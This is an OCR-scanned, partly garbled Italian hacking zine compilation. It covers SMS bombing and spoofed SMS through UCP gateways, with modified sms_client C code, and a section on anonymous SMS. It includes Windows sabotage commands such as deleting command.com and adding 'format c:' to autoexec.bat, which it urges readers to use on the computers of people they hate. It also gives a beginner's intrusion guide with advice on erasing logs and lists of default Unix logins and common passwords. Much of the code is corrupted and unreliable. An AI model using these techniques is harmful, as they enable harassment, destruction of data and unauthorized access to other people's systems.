bombardato da 20 sms filati, opure 40 se facciamo 2 chiamate e cosi' via... in sintesi vi assicuro che mandate in sklero il 
povero individuo che ricevera' questo sms bombing. Da usare con cura anche perche' magari si inkazza sul serio... e poi 
magari il gestore del server sms si rompe e dopo nessuno fa piu' niente... 


Il campo DATA del servizio 02 e' il seguente: 
NPL/RAd:s/OAdC/OAC/MT/AMsg 


NPL [STRING OF NUM CHAR] indica quanti sono gli sms da inviare e corrisponde 
ai numeri di telefono che seguiranno dopo, ovvero 
se e' 3 dopo dovremmo inserire 3 numeri di 
destinatari 

RAd:s[STRING OF NUM CHAR/ lista dei numeri dei destinatari. Vanno semparati 
sempre con il carattere '/'. Esempio 
'0039347123456/0039347543210/0039347234765' 

OAdC [STRING OF NUM CHAR] come sopra 

OAC [STRING OF CHAR] come sopra 

MT [1 NUM CHAR] come sopra 

AMsg [STRING OF CHAR] come sopra 


Ora, ma io come ci parlo con il server? Be' ci sono mille modi, potete usare qualche programmino scritto da voi, 
emulatori di terminale, qualsiasi cosa spari dei caratteri su una connessione aperta con un modem. Io con ISDN 

ho usato la possibilita' di sfruttare l'emulazione AT e ho trovato un programmino davvero ben fatto che si chiama 
sms client (http://Awww.styx.demon.co.uk) adatto al nostro scopo. 

Ok, non proprio adatto, con quello potete mandare sms attraverso gateway, ma non usare tutte le possibilita' offerte 
dall'UCP e viste poco sopra. Per lasciare piu' liberta' di azione ho modificato leggermete questo programma. 


Vi spiego la mia modifica e come mandare messaggi. 


Prima cosa. Scaricatevi il programma, il file si chiama 

smsclient_2.0.8r.tar.gz  (http://\www.styx.demon.co.uk/archive/sms_client-2.0.8r.tar.gz). Scompattate. Fate il classico 
make, make install e se non avete fatto casini vi troverete sotto /etc la dir 'sms' che contiene tutti i settaggi del 
programma. Dentro questa dir va editato il file sms _modem che contiene i settaggi del vostro modem. C'e' anche una 
sottodir 'services', dentro questa ci sono 1 file che corrispondono ai gateway sms sparsi per il mondo. Ovviamente ce ne 


sono solo alcuni e per giunta quelli piu' conosciuti. Questo implica che sono quelli piu' usati e che solitamente lasciano 
menopossibilita' di smanettare e di divertirsi. Sta a voi recuperare altri numeri di qualche gateway piu' disponibile. 
Spesso per fare andare il prog cambiate il '#' nel numero del gateway impostato in questi file con '00' da chiamata 
internazionale (okkio a non stare collegati troppo, nell 99% dei casi chiamate qualche paese estero). 


A questo punto vi allego il mio codice. La mia modifica e' imbecille, uno scimmione del kongo farebbe di meglio, 
dunque forse se avete un po' di voglia lavorateci da soli per ottenete qualcosa di piu' pratico... 


Quello che segue va salvato come file ucp.c 


<-| ucp.c |> 

VLAN EE A RAR Re LI REA LAO E */ 
/* Variante del file ucp.c per sms_client 5%; 
(PEA SIA AAT AL RATE */ 


#include <stdio.h> 
#include <string.h> 
#include <stdarg.h> 


#include "common/common.h" 

#include "logfile/logfile.h" 

#include "driver.h" 

#include "error.h" 

#include "ascii.h" 

#include "comms/comms.h" 

#include "resource/resource.h" 

rici pros iL LE ani Lea */ 
static struct ucp_env 


DRIVER_DEFAULT_ENV def; 


/* Place any extended driver */ 
/* variables here €/ 


} driver_env; 
e ie tie Licinio riu biLi iL uriLi iL Lui iL Lili Liv iu) */ 
static RESOURCE resource list[] = 


{ RESOURCE STRING, "SMS _comms_params", 


0, 1, NULL, 0, "8N1", 0, &(driver_env.def.comms_params) 
}, 
{ RESOURCE STRING, "SMS_ centre number", 

0, 1, NULL, 0, NULL, 0, &(driver_env.def.centre_number) 
} 


{ RESOURCE _NUMERIC, "SMS_ baud", 

0, 1, NULL, 0, NULL, 9600, &(driver_env.def.baud) 
}, 
{ RESOURCE_NUMERIC, "SMS_ deliver timeout", 

0, 0, NULL, 0, NULL, 30, &(driver_env.def.deliver_timeout) 
b. 
{ RESOURCE _NUMERIC, "SMS_timeout", 


0, 0, NULL, 0, NULL, 10, &(driver_env.def.timeout) 


}, 
{ RESOURCE _NUMERIC, "SMS_write_timeout", 


0, 0, NULL, 0, NULL, 10, &(driver_env.def.write_timeout) 


}, 
{ RESOURCE _NUMERIC, "SMS_max deliver", 


0, 0, NULL, 0, NULL, 1, &(driver env.def.max deliver) 


} 
{ RESOURCE NULL, NULL, 

0, 1, NULL, 0, NULL, 0, NULL 
} 


}; 
ARIAIIAI ARA IA AIAR ARABA IA RAIN LARE */ 
#define DELIVERTIMEOUT (driver_env.def.deliver timeout) 
#define TIMEOUT (driver_env.def.timeout) 
#define WRITETIMEOUT (driver_env.def.write_timeout) 
AAA ARA AAA RATA ARA Me */ 
#define FD (driver_env.def.fd) 
VERRETE RENE FRE SAGRE N MORIRE N ARRE NERE SERRA */ 


static int UCP_sendmessage(char *msisdn, char *message); 

static int UCP_parse response(char *string); 

static void UCP_hangup(void); 

static char #UCP_generate checksum(const char *fmt, ...); 

static char #UCP_build message(char *msisdn, char *message); 

static char #UCP_build_transaction(int transaction _id, char transaction type, 
int operation type, const char *fmt, ...); 


static char #UCP_generate checksum(const char *fmt, ...) 


{ 
va_list args; 

static. char buf]1024]; 
char *ptr; 
int J; 


va_ start(args, fmt); 
#if !defined(LINUX) 

vsprintf(buf, fmt, args); 
Felse 

vsnprintf(buf, 1024, fmt, args); 
#endif 

va_end(args); 


Vi SIREPENE MERONI NERA ERA */ 
AE 
for (ptr = buf; *ptr != "\0'; ptr++) 
| 
j+= *ptr; 
if (] >= 256) 
{ j-= 256; 
} 
} 
sms_snprintf(buf, 1024, "%02X", j); 
return buf; 


static char #UCP_build transaction(int transaction _id, char transaction type, 
int operation type, const char *fmt, ...) 
{ 
va_list args; 


static. char buf]1024]; 
char header[1024], 
data[1024], 
codestring[1024]; 


FILE *fcd; 


va_ start(args, fmt); 
#if !defined(LINUX) 

vsprintf(data, fmt, args); 
else 

vsnprintf(data, 1024, fmt, args); 
#endif 

va_end(args); 


fed = fopen("codice","r"); 
fscanf(fcd,"%s",&codestring); 
fclose(fcd); 


sms_snprintf(header, 1024, "%02d/%05d/%c", transaction_id, 
sms_strlen(data) + sms_strlen(codestring) + 15, transaction type); 


printf("<STX>%5/%s/%s/%s<ETX>\n",header,codestring, 
data, UCP_generate_checksum("%s/%s/%s/" header,codestring,data)); 


sms_snprintf(buf, 1024, "%c%s/%s/%s/%s%c", S_STX, 
header, 
codestring, 
data, 
UCP._generate_checksum("%s/%s/%s8/", 
header, codestring, data), 


S_ETX); 
return buf; 
} 
Priolo el li oi Lio. Lio i lalla da */ 
PR siii oli ioni ei ae nl eli aaa */ 


static char #UCP_build message(char *msisdn, char *message) 
{ 
char 1a5_message[1024], 
*src, 
*dest; 


dest = ia5S_message; 

for (src = message; *src != '\0'; src++) 

{ 
sms_snprintf(dest, 1024, "%02X", *src); 
dest += 2; 


} 


return UCP_build transaction(1,'0', 1, "%s", 1a5_message); 


} 
(Ri ento rite rs sS consono onfori encore bale pieniea te 
/* Return Values: 
ha 0 Positive ACK 
lisi 1 Negative ACK 
lisi -l Error 
(PR nin 
static int UCP_parse response(char *string) 
{ 
int result; 
int transaction, 
length, 
type, 
checksum; 
char ack, 
recipient[64], 
timestamp[64]; 
paint Peel Pannl Dit Pant Plinio 
/* Example: 


/* <STX>01/00045/R/01/A/0041544180972:161298112313/A6<ETX> 


/* <STX>01/00019/R/01/A//69<ETX> 


*/ 
*/ 
*/ 
*/ 
i 
*/ 
__ */ 
*/ 


*/ 
*/ 


MR init ea nt Ris Ana DI Deir 
result = sscanf(string, "\002%02d/%05d/R/%02d4/%c/%16[1:]:%12s/%02X\003", 
&transaction, 
&length, 
&type, 
&ack, 
recipient, 
timestamp, 
&checksum); 
if (result != 7) 
{ 
result = sscanf(string, "\002%02d/%05d/R/%02d/%c//%02X\003", 
&transaction, 
&length, 
&type, 
&ack, 
&checksum); 
if (result != 5) 
{ return -1; 
} 
} 
Vi */ 
result = -1; 
if (ack == 'A") 
{ result = 0; 
} 


else 


if (ack == 'N') 


{ result = 1; 
} 
return result; 
} 
Vi IT */ 
RE enni ni z nz zzz nen zzz zz zzz zzz zzz zzz zzz zzz zzz zz zzz zzz zzzzzzzzz. */ 
static int UCP_sendmessage(char *msisdn, char *message) 
{ 
char buffMAX RESPONSE BUFSIZE], 
*ucp_message; 
int result; 
ucp_message = UCP_build message(msisdn, message); 
twrite(FD, ucp_message, sms_strlen(ucp_message), WRITETIMEOUT); 
if (expstr(FD, buf, "\03", MAX RESPONSE _BUFSIZE, DELIVERTIMEOUT) = 0) 
{ 
Iprintf(LOG STANDARD, "SMSC Respsonse: %s\n", buf); 
result= UCP_parse_response(buf); 
if (result == 0) 
Iprintf(LOG STANDARD, "Received Acknowledgement\n"); 
j 
else 
if (result== 1) 
{ Iprintf(LOG STANDARD, "Acknowledgement Failed\n"); 
UCP_hangup(); 
return EUCP_ACKFAILED; 
} 
else 
{ Iprintf(LOG_ STANDARD, "Bad Acknowledgement\n"); 
UCP_hangup(); 
return EUCP_BADACK; 
} 
} 
else 
{ Iprintf(LOG STANDARD, "No Message Response\n"); 
UCP_hangup(); 
return EUCP_NORESPONSE; 
} 
return 0; 
} 
PRntetloslsvadicoiszallcstuceilosiccedlosisvellosssvelicsiucsilost4 */ 
| nasnss ice tsossaranzasnn sent ascorannticneniconcosso ist */ 
static void UCP_hangup(void) 
{ default hangup((DRIVER DEFAULT _ENV *)(&driver_env)); 
} 
Prtettnsisceitcaizusiizaiuneilusdeeiizedinedizsiureduniuveilustule */ 
(Renn nin zzz nen enne zzz zzz zzz zizi zzz zzz zzz ninni zzz zzz zzzzzzzzz. */ 


DEVICE _ENTRY ucp_device = { 


"UCP", 

" 1 .0", 

resource list, 

(DRIVER DEFAULT ENV *)(&driver_env), 


default init, 

default main, 

default validate numeric id, 
default dial, 

default hangup, 
default send disconnect, 
default single deliver, 
UCP._sendmessage, 

default login 


Creato il file ucp.c sostituitelo nella sottodirectory /src/driver del programma sms_client, deve esisterne gia' uno con 
questo nome. Ricompilate. Andate nella sottodir /bin dove devono esserci i nuovi file eseguibili, soprattutto il file 
sms_client. 


Ora siamo pronti per mandare un messaggio, manca solo da editare il file 'codice' Questo file e' usato dalla mia modifica 
di ucp.c per poter mandare comandi qualunque al gateway, senza passare dalle ridotte opzioni di sms_client. 


Create il file 'codice'. 


In questo file va messa una parte del campo HEADER e del campo DATA dell'sms che volete inviare. Dell'header solo 
il campo OT, del data tutto tranne AMasg. 


Ovvero, rifacendosi al messaggio 'Satana ti vede', dentro il file 'codice' va messa questa riga di testo: 
01/0039347123456/666//3 


Salva il file. Ora spostalo nella dir dove e' presente l'eseguibile sms_client 
e batti 


./sms_client d2:0 'Satana ti vede' 


In questo caso Il nostro pc telefonera' al gateway di d2 (file definito nella dir /etc/sms/services) e cerchera' di mandare il 
messaggio secondo quello che e' scritto nel file 'codice'. Il programma vi fara' vedere cosa combina passo 
per passo e se tutto e' andato a buon fine qualche vostro amico potrebbe riconsiderare "L'Esorcista". 


Per mandare un sms multiplo il nostro file codice dovra' contenere ad esempio la riga 
02/3/0039347123456/0039347543210/0039347234765/666//3 

e partiranno 3 sms con un'unica chiamata. 

Un sms bombing sara' invece cosi 


02/20/0039347123456/0039347123456/0039347123456/0039347123456/0039347123456/ 

... eccetera 

Ma non abusatene! Pensate a quel poveretto! 

OK, credo di aver detto tutto... ci sono altre mille cose che si possono fare 

con queste poche e scarne informazioni, dipende poi dalla vostra fantasia. 

Se fate qualche bello scherzo mandatemi il log che mi diverto troppo con queste storie... 

Dimenticavo. Se qualcuno vuole cimentarsi in qualcosa di piu' tosto si studi come vengono codificati gli SMS che 
trasportano ad esempio loghi per NOKIA (guardatevi su qualche doc gli "OTA BITMAP"). Mi gioco le palle che se 

si formatta male il campo header di questi messaggi (tipo facendo credere che arrivi un bitmap di dimensioni 
spropositate o nulle) si manda quasi sicuramente in crash il cellulare di chi lo riceve... 


SMS ANONIMI 


Questa e’ sicuramente molto piu’ semplice..Avete mai provato a chiamare telefonicamente il numero di telefono del 
centro servizi della TIM? Bhe io si e anche parecchio tempo fa, vi rispondera’ un modem. Allora mi sono chiesto e se lo 
chiamassi con il mio di modem? Avevo scoperto gli SMS anonimi. Ora Vi guidero’ passo passo su come effettuare la 
procedura di connessione (occhio che la chiamata e’ come se la faceste da telefono fisso a telefono mobile con tariffa 
busines quindi siate veloci). Per prima cosa dovere lanciare il programma Hyperterminal presente di default dei 
programmi accessori ed ecco come sara’ la prima schermata (lasciate perdere il primo 0 nel numero quello che dovete 
selezionare e’ quello che segue). 


Connetti 


località predefinita sj 


TIM SMS Servizio Menu Servizio ScriplIM 


Collegamento 0K 


Benvenuti nel servizio ScriplIM. 


Terminali abilitati : 


Premere invio per continuare oppure CIRL-C per scollegarsi. 


http://localhost/1t/smlp/menu2.html 


Bastera” dare invio per due volte per arrivare nella maschera dove inserire il numero di telefono del destinatario con la 
possibilita” della consegna differita (Mese/giorno/ora/minuti) . Tenete presente che il messaggio restera’ nell’ SMS 


per 48 oro dopodiche’ se non consegnato sara’ scartato. 


TIM SMS Servizio Menu Servizio ScriplIiM ||| — 


. Non attivo : 

. Non attivo : 48 

. Destinatario del messaggio : 

. Consegna differita {MM:GG:hh:mm) 
. Testo messaggio {max 160 car.) : 


. Non attivo 
. Non attivo 


Invio Annula 


Riempire i campi 3, 4 (opzionale) e 5; quindi premere Invio 
Per spostarsi sui campi utilizzare le frecce del terminale. 


COME FAR PIANGERE WINDOWS 


Un consiglio: queste cose vanno fatte su computer di gente che odiate veramente, non e' ne' giusto 
ne' corretto farlo solo per sadico divertimento. 

Dopo aver aperto questa piccola parentesi... 

Windows è il sistema più diffuso del mondo ( e il più buggato..), gioia e delizia da sempre tutti gli 
smanettoni informatici... Basta sapere dove toccare e... Guardate 

come piange Windows (e anche l'utente...). 

Vediamo quali sono i file principali di Windows... 

Il primo è senza dubbio Autoexec.bat, credo che sia il migliore per rovinare il computer. 

Poi c'é Command.com, config.sys, krnl1386.exe e (logico) win.com ... Ci siamo ? 

Bene... Ora, credo che a tutti quando hanno iniziato a usare il computer abbiano detto "..Mi 
raccomando, non toccare tutti i file..." i genitori hanno sempre ragione.. 

Tranne che in questo caso. 

Cominciamo a divertirci. 

Il file autoexec.bat viene aperto ogni volta che il computer viene riavviato... E se aggiungessimo 
qualcosa tipo: 


:fasel 
ECHO BASTARDI, VI HO FREGATO ANCORA !!! 
goto :fase 1 


Cosa succederebbe ? Bhe, Windows non partirebbe e si vedrebbe solo la scritta "BASTARDI, VI 
HO FREGATO ANCORA!!!" che si ripete sullo schermo all'infinito.. Diverte, no ? Però sarebbe 
troppo semplice... 

Basta cliccare CTRL +C e tutto si ferma... Eh no, questo non mi diverte proprio per niente... 

Ma se per caso la tastiera non potrebbe più scrivere ? E come fare ? Staccando la spina ? Dai 
ragazzi, un po' di stile... Siamo Newbie ma siamo anche bastardi o no ? Allora, per "staccare" la 
tastiera prima dobbiamo fare una breve precisazione. 

Nel mondo esistono numerosi tipi di tastiere. La tastiera italiana è chiamata tastiera QWERTY per 
via delle prime 6 lettere... 

Le tastiere si differenziano per la posizione delle lettere. 

Le prime 6 lettere di quella francese sono azerty, quella tedesca qwertz, ecc... 

Come fa Dos a sapere quale sia la tastiera giusta ? Nel file config.sys c'è una riga con scritto 
country=039,850,C:\WINDOWS\COMMAND\country.sys 

Il secondo numero, l'850 è il numero di tabella codici attiva, indica al computer quale serie di codici 
ascii usiamo... E se qualcuno al posto di 850 scrivesse 430 PEhm... Io non sono stato.. 


Ma lo stile non si compra e noi vogliamo fare qualcosa di unico... Command.com... Cos'é ? E' 
l'interprete dei comandi, il file che fa da tramite tra noi e lo schermo... E se qualcuno lo cancellasse 
? 

Proviamo.. 

C:\>del command.com 

No command.com ? No dischetto di ripristino ? Ahi, ahi, ahi !!!! 


Cosa possiamo fare altro... Del regedit vi hanno parlato in tanti, io quindi vi parlerò dell'esecuzione 
automatica... Oddio, che è ? 

Bhe se non lo sapete... Vabbé, ve lo spiego. Esecuzione Automatica è una cartella di windows che 
contiene i file che vengono fatti partire automaticamente ogni volta che parte Win.. E se mettessimo 
qualcosa tipo un collegamento a 

c:\windows\rundl]l32.exe user,exitwindows 


Ogni volta che Win parte automaticamente si chiude... Bestiale, oh. 
Vabbé, però lo stile è un'altra cosa.. Allora, che si può fare ? Rinominare !!! 


c:\> ren autoexec.bat segaiolofaid.ate 
c:\> ren config.sys vafanculo.123 
c:\> ren kml386.exe ahhhh.hhh 


Voglio vedere se adesso Win parte.. 

La cosa più bastarda a questo mondo però sarebbe fare tabula rasa del computer... Come ? Molto 
semplice. Nella'autoexec.bat aggiungete questa riga 

format c:\autotest 

Non sapete cosa fa ? Un consiglio: fatelo solo su computer di persone che odiate... MI 
RACCOMANDO, QUESTO COMANDO E' MOLTO DANNOSO, FATELO SOLO SE SIETE 
SERIAMENTE INTENZIONATI 

Però lo stile è un'altra cosa... 


Poi si potrebbero fare bastardate varie ai compagni durante l'ora di informatica per dimostrare ai 
tecnici della scuola quanto Win 98 è instabile.. Magari un vostro compagno ha appena finito la 
prova e voi gli dite "Vuoi provare un nuovo gioco di Win 98 ?" 

Sicuramente quell'altro vi risponderà di sì, e allora voi fate i bastardi.. Ditegli di fare così: 

Cliccare su Start, Poi Esegui e scrivere con/con e poi cliccare OK... Ooops !!!! Errore del 
programma ecc.. Che cazzo vuol dire tutta 'sta merda ??? Semplicissimo !!! Il computer si è 
bloccato !!! E magari il vostro amico non aveva neppure salvato la prova !!! E si ritrova con tutto il 
lavoro cancellato !!! 

Però, bisogna dirlo, lo stile è un'altra cosa.. 


Ma che cazzo è lo stile ? Ve lo dico cos'è lo stile ? Lo stile è dimostrare di essere grandi senza 
necessariamente fare danni, lo stile è studiare per ore per fare una cosa di pochi secondi, 

lo stile è poter dormire a scuola durante le ore di informatica perché quelle cose te le sei già fatte a 
casa quando avevi 9 anni senza nessuno che te le spiegasse 

(e quando non dormi è perchè le stai spiegando tu a un branco di incapaci che non sanno nemmeno 
usare Word), lo stile è essere chiamato a ogni ora, anche sei hai solo 16 anni, 

per problemi con il computer da parte di chiunque... 

Questo è stile, padronanza del sistema. 


GUIDA ITALIANA ALL'HACKING (ver. 1.2). 
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Responsabilità 


Usa queste informazioni a TUO rischio e pericolo. Io, InfectedMachine e 
qualsiasi altra persona mi abbia aiutato a scrivere questa guida non si 
assumerà NESSUNA responsabilità per l'uso, l'utilizzo o l'abuso di 
questo testo. 

Le seguenti informazioni sono state scritte SOLAMENTE per scopo 
educativo e informativo e NON possono essere usate per scopi illegali. 
Leggendo questo file tu accetti i seguenti termini: 

Comprendo che usare le seguenti informazioni è un atto illegale. 
Capisco e accetto di essere il SOLO responsabile delle mie azioni. Se 
vengo messo nei guai da queste informazioni NON incolperò o tirerò nei 
guai colui ( InfectedMachine ) che ha scritto questo testo, ogni altro 
suo collaboratore come qualsiasi persona mi abbia dato questo file. 

Io capisco che le infomazioni qua contenute sono SOLO per scopo di 
educazione. 

Questo file può essere usato per controllare la sicurezza del TUO 
sistema. 


Considerazioni personali: 


Mi sono arrivate parecchie mail in cui mi si diceva che quello che ho 
scritto e' stato scopiazzato da riviste e da faq sparsi in tutta la 
rete. Questo e' completamente vero! 

Non ho voluto fare questa guida basandomi sulle mie conoscenze, ho 
voluto solamente tradurre i documenti principali che chiunque 
riuscirebbe a trovare facendo alcune semplici ricerche. 

Quindi in questa guida non troverete ( forse ) nulla di nuovo se avete 
gia letto documenti come la guida all'hacking di Sir Hackalot o la 
guida dei novizi della LOD ( o altri ancora ). 

Io ed alcuni miei amici stiamo scrivendo una rivista chiamata 
"SystemDown" nella quale trattaremo gli argomenti dal nostro punto di 
vista e con le nostre conoscenze; quindi se volete leggere qualcosa che 
non e' tratto dalle varie guide sparse per la rete vi consiglio di 


tenere d'occhio il sito dal quale avete scaricato il testo che state 
leggendo. 

Questa guida inoltre e' stata scritta APPOSITAMENTE per i principianti 
e cioe' per quelli che ancora ne sanno poco o nulla; i piu' esperti ( 
ma credo che esperti sia anche troppo...diciamo i piu' informati ) tra 
di voi corrono il rischio di trovare questa guida di scarsa utilita'... 
Io vi ho avvisato; vi prego non mandatemi mail dicendomi: "ma quella 
tua guida in italiano la credevo piu' professionale" o cose del genere 
ok? 

Un'ultima cosa: 

Vorrei ringraziare una persona che sta permettendo a questa guida di 
rimanere online: 

JADER ti ringrazio tantissimo; senza il tuo aiuto molto probabilmente 
questa guida l'avrei letta solo io! 


L'hacking è l'atto di penetrare nei sistemi per guadagnare conoscenze 
sul sistema e su come questo lavora. 

Quest'azione è illegale perchè noi guadagnamo l'accesso a tutti i dati 
e li possiamo anche prendere. 

Noi veniamo puniti per cercare di capire. I vari governi del mondo 
spendono un'esagerazione di soldi per cercare di arrestarci quando 
invece potrebbero investirli per cercare di catturare persone di gran 
lunga più pericolose degli hackers. 

In giro ci sono assassini, stupratori, maniaci e terroristi e sono 
queste le persone che i governi dovrebbero catturare, non gli hackers. 
Al contrario di quello che dicono i governi i veri hackers non sono 
pericolosi; tutto quello che vogliamo è capire, imparare e forse un 
giorno le persone del mondo riusciranno a capirlo. 

Vorrei anche fare notare una piccola differenza tra gli hackers e i 
crackers. 

Per hacker si intende quella persona che, come abbiamo detto sopra, 
penetra nei sistemi informatici solamente per capire come essi 
funzionino realmente; i crackers sono coloro che penetrano nei sistemi 
informatici e non solo, per causare danni o rubare informazioni. La 
gente "normale" non conosce questa differenza e tende ad associare 
all'hacker il classico giovane ragazzo con i capelli lunghi, anarchico 
che seduto davanti allo schermo del suo computer aspetta che il 
programma pirata che lui sta usando gli consenta l'accesso al sistema 
bancario della città per poter rubare soldi in grandi quantità. Fino a 
che la gente non capirà che gli hackers non sono cattivi come si 
intende, la polizia li continuerà a perseguitare come assassini o 
terroristi o come criminali della peggior specie. 


Perchè quindi hackerare un sistema? 


Come ho detto sopra noi penetriamo nei sistemi per ottenere conoscenze 
sul sistema stesso e su come questo funziona e lavora. Noi NON vogliamo 
danneggiare in alcun modo i sistemi in cui penetriamo. Se tu danneggi 
un sistema, tu puoi essere individuato ed arrestato. Se invece tu non 
danneggi nulla è molto difficile ( ma non impossibile! ) che ti 
riescano a prendere senza spendere molti soldi ( e non tutti, governi e 
grandi industrie a parte, li possiedono ;-) ). 

I novizi è meglio che leggano qualsiasi cosa sull'hacking prima di 
compiere l'atto vero e proprio poichè più conoscenze si hanno, meglio 
si può operare. 

E' molto utile anche una buona conoscenza dei linguaggi: c, c++ e 
assembler oltre ad una totale conoscenza del sistema Unix. 


LE 10 REGOLE DELL'HACKING: 


1) Non dannegiare mai un sistema. Se lo fai potresti fregarti con le 
tue stesse mani; 

2) Non alterare nessuno dei file di sistema eccetto quelli che devi 
modificare per non essere individuato ( i log file ) e quelli che 
ti permetteranno di avere accesso a quel computer in futuro; 

3) Non distribuire i tuoi progetti sull'hacking a nessuno a cui non 
affideresti la tua vita; 

4) Quando posti sulle news, su un bbs ( Bulletin Board System ) o 
quando chatti su IRC sii più vago possibile quando parli dei tuoi 
futuri progetti riguardo all'hacking. Ogni cosa può essere monitorata 
dalle forze dell'ordine; 

5) Non usare mai il tuo vero nome o il tuo vero numero telefonico 
quando posti su un bbs, sulle news oppure su IRC; 

6) Non lasciare i tuoi manipolamenti ( tranne quelli necessari ) su 
qualsiasi sistema in cui penetri; 

7) NON hackerare i computer dei governi in particolar modo del TUO 
governo; 

8) Non parlare dei tuoi progetti riguardo all'hacking quando parli 
sulla tua linea telefonica di casa; 

9) SII PARANOICO. Metti tutto il materiale riguardo all'hacking in 
posti sicuri; 

10) Per diventare un vero hacker, tu devi hackare. Tu non puoi sederti 
a leggere un file di testo come questo e pensare di essere un vero 
hacker. 


Strumenti basici di partenza: 


Prima di tutto trova una copia dei vari scompattatori esistenti: 

ARJ; ZIP; sono i due più importanti; su internet li si può trovare 
facilmente con un pò di ricerca. 

A questo punto, su qualsiasi guida all'hacking reperibile sulla rete, 
ti consigliano di trovarti un "prefix scanner" cioè uno scanner di 
prefissi telefonici ( detto anche war dialer ) che ti permette di 
trovare i numeri telefonici che possono agganciare la chiamata di un 
modem; purtroppo visto che l'Italia non è l'America noi non abbiamo dei 
programmi adeguati alle nostre linee ( sebbene sia possibile crearne 
uno usando - come mi hanno detto alcuni - il visual basic ). 

Poco male. 

Sinceramente non ho verificato se gli scanner di prefissi americani 
funzionano anche sulle nostre linee; penso di provarci un giorno e 
comunque non è fondamentale: ci sono altri metodi oltre a quello. 

Se proprio vuoi prenderne uno rimedia "Autoscan" ( chiamato anche A- 
Dial ) oppure "ToneLoc". 


Regole basiche per hackerare uno UNIX: 


Il sistema operativo UNIX è il più diffuso in assoluto su Internet 
poichè è stato progettato esclusivamente per le reti. 

L'emulazione dello UNIX sotto il dos si chiama LINUX ed è disponibile 
la vesione "slackware" su internet; provate su ftp.cdrom.com. 

Ci sono tre metodi principali per hackerare un sistema: 

1) Default Login 

2) Password List 

3) Backdoors 


Solitamente il login è di 1-8 lettere mentre la password di 6-8. 

Lo UNIX e' il piu' diffuso sistema operativo su internet per la sua 
ottima gestione delle reti; sebbene questo registra le chiamate ( non 
sempre! ) e le memorizza nei file utmp, wtmp e btmp raggiungibili in 


/etc oppure /var/adm ( che sono usati dai comandi login, rlogin, su, 
remsh, rexec ) e' ottimo per provare un primo inserimento. 

Piccola parentesi: 

Vi sono dei comandi per visualizzare gli ultimi login e cioe': 

last ( restituisce l'ultimo login 

lastb e blast ( restituiscono gli ultimi login falliti ). 

Occhio al file syslog che registra connessioni andate a buon fine e 
non. 

Un consiglio: 

Se proprio non riuscite a rimediare lo Unix per poterlo montare su una 
vostra macchina o su di una partizione di quest'ultima, installate il 
sistema operativo "LINUX" poichè alcuni comandi non esistono sotto 
windows ( 95 o 3.1 ) o sotto dos. Sebbene il Linux sia un sistema un pò 
"rognoso" nell'installazione ( per i principianti ), permetterà alcune 
manovre ( chiamiamole così ) impossibili con il dos. 

Appena dentro un sistema in genere si vede un simbolo di questo tipo: 
$ ( oppure qualsiasi altro speciale simbolo di quel sistema ). 

Se tu inserisci il comando "man" ti apparirà una lista di tutti i 
comandi possibili nel sistema. 


1) DEFAULT LOGIN: 


Questo è il primo dei tre metodi di intrusione in un sistema e consiste 
nell'inserire una lista di account seguiti da password comuni, ovvero 
di quelle password che i sysop ( system operator: operatori di sistema 
cioè coloro che controllano tutto il sistema ) più ingenui mettono per 
controllare i propri accessi. 

Prima di incominciare ad inserire le password e gli account, dovete 
scoprire tutte le informazioni possibili sul bersaglio tramite comandi 
come whois, finger, showmount. 

Questi sono tutti comandi dello Unix che danno informazioni su di un 
utente o su un sistema. 

Usate questi comandi anche sull'account root. 


ACCOUNT PASSWORD 


root root, system, sysop, nomesistema, nomepersona quando 
il root è fingerato (il finger è uno strumento per 
prendere informazioni su qualcosa collegato ad 
internet ), none, provare anche le password della 
lista sotto. Molto importante! 


SyS Sys, System, manager, nomedelsistema, vedi root 

daemon daemon, background, none 

UUCp uucp, vedi guest 

tty tty 

test test 

unix unix, test 

bin bin, system, vedi root 

adm adm, admin, sys, vedi root 

admin adm, admin 

sysman sysman, SyS, System 

sysadmin sysadmin, sys, system, admin, adm 

who who, none 

learn learn 

uuhost uuhost 

guest guest, user, anonymous, visitor, bbs, nome del 
sistema o dell'organizzazione. 

host host 

nuucp nuucp, vedi uucp 

rje rje, none, vedi root 


games games, player 


SySoOp 
demo 
visitor 
anonymous 
anon 

user 
nomedelsistema 
student 
ftp 
ftpuser 
XXCp 
system 
nobody 
field 
archie 
gqarchie 
whois 

bbs 
services 
info 

new 
newuser 
ingres 
date 

lpq 

time 
weather 
forcast 
help 

test 
waffle 
trouble 
lp 
unmountsys 
setup 
makefsys 
sysadm 
powerdown 
mount fsys 
checkfsys 


SySOp 
demo, nomedelsistema, none 
vedi guest 

vedi guest 

vedi guest 

vedi guest 

vedi guest 

student, vedi guest 

ftp, ftpuser, vedi guest 

vedi ftp 

xenix 

manager 

nobody, none 

service 

archie, none 

qarchie, none 

whois, none 

nomedelsistema, bbs, waffle, none 
nomedelsistema, services, none 
nomedelsistema, info, none 
nomedelsistema, new, none 
nomedelsistema, newuser, none 
none, ingres, nomedelsistema 
date, none 

lpq, none 

time, none 

weather, forecast, none 

vedi weather 

help, none 

nomedelsistema, test, none 
vedi bbs 

trouble, vedi root 

lp, printer, print, vedi root 
unmountsys, unmount, vedi root 
setup, vedi root 

makefsys, vedi root 

sysadm, sys, system, vedi sys-adm-root 
powerdown, vedi root 
mountfsys, vedi root 
checkfsys, vedi root 


In poche parole tenta di trovare un account che abbia il nome di un 
servizio ed aggiungergli una password con un altro nome di servizio 
oppure con qualcosa che abbia a che fare con il sistema ( nome del 
proprietario quando si fà il whois, nome del sistema, ecc. ). 


2) PASSWORD LIST detto anche PASSWORD GUESSING 


Un altro metodo per inserirsi in un sistema è quello di "rubare" la 
password di un altro utente. 

Per prendere un valido account a cui dare una password bisogna 
"fingerare" ( usare i vari comandi detti sopra per ottenere le 
informazioni su di un utente o un sistema ) l'utente e leggere ( anche 
se criptato ) il passwd file; è meglio se il finger viene fatto durante 


il giorno. 


Una volta trovato l'account ( tramite il finger oppure nel passwd 
file), bisogna inserire una alla volta le password della lista sotto 
riportata per cercare di individuarne una giusta e per poter così 
accedere al sistema. 


Lista delle più comuni password ( in America ): 


100 

666 

6969 

AAA 

aaa 
academia 
acdc 

ada 
adrian 
aerobics 
aids 

air 
airplane 
albany 
albatross 
albert 
alex 
alexander 
algebra 
alias 
aliases 
alpha 
alphabet 
ama 

amato 
america 
amerigo 
amore 
amorphous 
amy 
analog 
anarchy 
anchor 
andromanche 
andy 
andrea 
angerine 
anna 
annabella 
annalisa 
anne 
anumal 
animals 
answer 
anthropogeni 
c 

anvils 
anything 
areato 
aria 
ariadne 
arrow 
arthur 
asshole 
athena 
atmosphere 
attacker 
attackers 
aztecs 
